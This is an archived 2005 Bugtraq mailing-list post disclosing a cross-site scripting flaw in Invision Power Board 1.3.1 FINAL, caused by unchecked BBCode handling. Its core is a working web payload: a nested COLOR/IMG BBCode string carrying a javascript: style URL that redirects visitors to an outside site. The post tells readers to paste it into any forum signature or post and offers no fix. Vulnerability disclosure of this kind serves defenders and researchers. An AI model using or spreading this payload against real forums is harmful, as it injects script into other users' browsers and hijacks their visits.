[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

Invision Power Boards 1.3.1 FINAL XSS Exploit

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: Invision Power Boards 1.3.1 FINAL XSS Exploit
From: "Daniel A." <ldrada@xxxxxxxxx>
Date: 18 Feb 2005 02:37:48 -0000


Description:
Lack of checking in the SML codes.
Exploit:
Put this into any signature or post on an invision forum:
[COLOR=[IMG]http://aaa.aa/=`aaa.jpg[/IMG]]`style=background:url("javascript:document.location.replace('http://www.hackthissite.org');")
 [/color]
Fix:
I'm not good at regexes :)

Prev by Date: [ GLSA 200502-24 ] Midnight Commander: Multiple vulnerabilities
Next by Date: Dangers of discarding duplicated messages
Previous by thread: [ GLSA 200502-24 ] Midnight Commander: Multiple vulnerabilities
Next by thread: Dangers of discarding duplicated messages
Index(es):
- Date
- Thread